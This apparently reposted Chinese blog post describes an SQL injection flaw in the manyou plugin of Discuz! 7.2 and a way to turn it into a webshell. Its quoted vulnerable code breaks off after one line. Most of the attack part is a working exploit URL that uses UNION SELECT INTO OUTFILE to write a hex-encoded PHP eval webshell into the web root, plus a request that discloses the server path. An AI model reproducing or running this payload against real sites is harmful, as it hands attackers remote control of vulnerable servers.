在最新的discuz! 7.2中自带了一个新的应用程序插件manyou。恰恰在这个新插件中,没有对传入的参数进行检查,在GPC为off的情况下,导致注入漏洞的产生。
漏洞分析:
文件:./manyou/sources/notice.php
相关代码:
以下是引用片段: if($option == 'del') { |
很简单的一个漏洞。在没有查询结果返回的情况下我们往往只有采取盲注的方式,但如果当前数据库帐号有File_priv的话我们也可以直接 into outfile。
/userapp.php?script=notice&view=all&option=deluserapp&action=invite&hash=' union select NULL,NULL,NULL,NULL,0x3C3F70687020406576616C28245F504F53545B274F275D293B3F3E,NULL,NULL,NULL,NULL into outfile 'C:/inetpub/wwwroot/shell.php'%23
爆路径:/manyou/admincp.php?my_suffix=%0A%0DTOBY57
文章来源于lcx.cc:discuz! 7.2 manyou 插件暴路径 和 Get Webshell
相关推荐: 【VB技巧】VB Hex 十六进制值保存写入文件
VB Hex 十六进制值保存写入文件,VB Hex 十六进制保存写入文件,VB Hex 十六进制值保存文件,VB Hex 十六进制值写入文件,VB Hex 十六进制写入文件,VB Hex 十六进制保存文件,VB 十六进制保存写入文件,VB 十六进制写入…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论